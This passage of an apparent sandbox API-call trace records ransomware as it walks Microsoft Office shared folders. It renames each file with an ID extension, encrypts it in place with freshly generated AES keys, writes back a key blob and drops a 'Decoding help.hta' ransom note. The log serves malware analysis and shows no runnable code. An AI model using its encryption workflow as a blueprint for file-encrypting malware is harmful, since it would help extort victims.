Shared\\TextConv\\Wks9Pxy.cnv.[ID]g9uZrLhJaygpwRm1[ID]" [0044.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0052.060] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0053.299] CreateFileMappingA (hFile=0x32c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3f0 [0053.300] CryptAcquireContextA (in: phProv=0x18d1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18d1fcec*=0x34490b0) returned 1 [0055.037] CryptGenKey (in: hProv=0x34490b0, Algid=0x6610, dwFlags=0x1, phKey=0x18d1fce8 | out: phKey=0x18d1fce8*=0x6718f0) returned 1 [0055.038] CryptExportKey (in: hKey=0x6718f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x18d1fbe4, pdwDataLen=0x18d1fce4 | out: pbData=0x18d1fbe4*, pdwDataLen=0x18d1fce4*=0x2c) returned 1 [0055.038] MapViewOfFile (hFileMappingObject=0x3f0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdfa0) returned 0x2d0000 [0055.047] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x18d1fbe4*, pdwDataLen=0x18d1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x18d1fbe4*, pdwDataLen=0x18d1fcf8*=0x100) returned 1 [0055.047] CryptEncrypt (in: hKey=0x6718f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000, pdwDataLen=0x18d1fce4*=0xdfa0, dwBufLen=0xdfa0 | out: pbData=0x2d0000*, pdwDataLen=0x18d1fce4*=0xdfa0) returned 1 [0055.056] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0055.059] CloseHandle (hObject=0x3f0) returned 1 [0055.059] CryptDestroyKey (hKey=0x6718f0) returned 1 [0055.059] CryptReleaseContext (hProv=0x34490b0, dwFlags=0x0) returned 1 [0055.059] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.059] WriteFile (in: hFile=0x32c, lpBuffer=0x18d1fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x18d1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x18d1fbe4*, lpNumberOfBytesWritten=0x18d1fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.960] WriteFile (in: hFile=0x32c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x18d1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x18d1fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.960] CloseHandle (hObject=0x32c) returned 1 [0056.960] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.530] FindNextFileW (in: hFindFile=0x5da6f8, lpFindFileData=0x18d1fd30 | out: lpFindFileData=0x18d1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ce200, ftCreationTime.dwHighDateTime=0x1cbd856, ftLastAccessTime.dwLowDateTime=0xc226ea20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x56ce200, ftLastWriteTime.dwHighDateTime=0x1cbd856, nFileSizeHigh=0x0, nFileSizeLow=0x30170, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPFT532.CNV", cAlternateFileName="")) returned 1 [0058.530] lstrcpyW (in: lpString1=0x2515f9f0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" [0058.530] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned 63 [0058.530] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Decoding help.hta" [0058.530] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\decoding help.hta")) returned 0x1 [0058.530] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WPFT532.CNV") returned -1 [0058.530] lstrlenW (lpString="WPFT532.CNV") returned 11 [0058.530] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" [0058.530] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned 63 [0058.530] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\", lpString2="WPFT532.CNV" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" [0058.530] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" [0058.530] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV.[ID]g9uZrLhJaygpwRm1[ID]" [0058.530] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.531] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0058.531] CreateFileMappingA (hFile=0x32c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6d0 [0058.531] CryptAcquireContextA (in: phProv=0x18d1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18d1fcec*=0x10e27cf0) returned 1 [0060.233] CryptGenKey (in: hProv=0x10e27cf0, Algid=0x6610, dwFlags=0x1, phKey=0x18d1fce8 | out: phKey=0x18d1fce8*=0x6714b0) returned 1 [0060.234] CryptExportKey (in: hKey=0x6714b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x18d1fbe4, pdwDataLen=0x18d1fce4 | out: pbData=0x18d1fbe4*, pdwDataLen=0x18d1fce4*=0x2c) returned 1 [0060.234] MapViewOfFile (hFileMappingObject=0x6d0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x30160) returned 0x3d10000 Thread: id = 389 os_tid = 0xacc [0043.865] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*", lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da6b8 [0044.269] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.270] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.270] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.270] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.270] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AFTRNOON", cAlternateFileName="")) returned 1 [0044.270] lstrcmpW (lpString1=".", lpString2="AFTRNOON") returned -1 [0044.270] lstrcmpW (lpString1="..", lpString2="AFTRNOON") returned -1 [0044.270] lstrcmpiW (lpString1="windows", lpString2="AFTRNOON") returned 1 [0044.273] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0044.273] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0044.273] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="AFTRNOON" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON" [0044.273] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*.*" [0044.273] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0044.273] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f874b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f8 [0044.274] CloseHandle (hObject=0x4f8) returned 1 [0044.274] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARCTIC", cAlternateFileName="")) returned 1 [0044.274] lstrcmpW (lpString1=".", lpString2="ARCTIC") returned -1 [0044.274] lstrcmpW (lpString1="..", lpString2="ARCTIC") returned -1 [0044.274] lstrcmpiW (lpString1="windows", lpString2="ARCTIC") returned 1 [0044.277] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0044.277] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0044.277] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="ARCTIC" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC" [0044.277] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*.*" [0044.277] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0044.277] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f9f518, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f8 [0044.278] CloseHandle (hObject=0x4f8) returned 1 [0044.278] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AXIS", cAlternateFileName="")) returned 1 [0044.278] lstrcmpW (lpString1=".", lpString2="AXIS") returned -1 [0044.278] lstrcmpW (lpString1="..", lpString2="AXIS") returned -1 [0044.278] lstrcmpiW (lpString1="windows", lpString2="AXIS") returned 1 [0044.280] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0044.280] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0044.280] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="AXIS" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS" [0044.280] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*.*" [0044.280] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0044.280] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e970a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f8 [0044.281] CloseHandle (hObject=0x4f8) returned 1 [0044.281] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLENDS", cAlternateFileName="")) returned 1 [0044.281] lstrcmpW (lpString1=".", lpString2="BLENDS") returned -1 [0044.281] lstrcmpW (lpString1="..", lpString2="BLENDS") returned -1 [0044.281] lstrcmpiW (lpString1="windows", lpString2="BLENDS") returned 1 [0044.284] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0044.284] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0044.284] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="BLENDS" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS" [0044.284] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*.*" [0044.284] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0044.284] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10eaf108, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f8 [0044.285] CloseHandle (hObject=0x4f8) returned 1 [0044.285] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUECALM", cAlternateFileName="")) returned 1 [0044.285] lstrcmpW (lpString1=".", lpString2="BLUECALM") returned -1 [0044.285] lstrcmpW (lpString1="..", lpString2="BLUECALM") returned -1 [0044.285] lstrcmpiW (lpString1="windows", lpString2="BLUECALM") returned 1 [0044.287] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0044.287] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0044.287] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="BLUECALM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM" [0044.287] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*.*" [0044.287] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0044.288] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10ec7170, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f8 [0044.288] CloseHandle (hObject=0x4f8) returned 1 [0044.288] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BLUEPRNT", cAlternateFileName="")) returned 1 [0044.288] lstrcmpW (lpString1=".", lpString2="BLUEPRNT") returned -1 [0044.288] lstrcmpW (lpString1="..", lpString2="BLUEPRNT") returned -1 [0044.288] lstrcmpiW (lpString1="windows", lpString2="BLUEPRNT") returned 1 [0044.291] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0044.291] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0044.291] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="BLUEPRNT" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT" [0044.291] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*.*" [0044.291] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0044.291] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10edf1d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f8 [0044.292] CloseHandle (hObject=0x4f8) returned 1 [0044.292] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOLDSTRI", cAlternateFileName="")) returned 1 [0044.292] lstrcmpW (lpString1=".", lpString2="BOLDSTRI") returned -1 [0044.292] lstrcmpW (lpString1="..", lpString2="BOLDSTRI") returned -1 [0044.292] lstrcmpiW (lpString1="windows", lpString2="BOLDSTRI") returned 1 [0044.294] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0044.294] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0044.294] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="BOLDSTRI" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI" [0044.294] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*.*" [0044.294] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0044.294] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10ef7240, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f8 [0044.295] CloseHandle (hObject=0x4f8) returned 1 [0044.295] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a61ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BREEZE", cAlternateFileName="")) returned 1 [0044.295] lstrcmpW (lpString1=".", lpString2="BREEZE") returned -1 [0044.295] lstrcmpW (lpString1="..", lpString2="BREEZE") returned -1 [0044.295] lstrcmpiW (lpString1="windows", lpString2="BREEZE") returned 1 [0044.298] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0044.298] 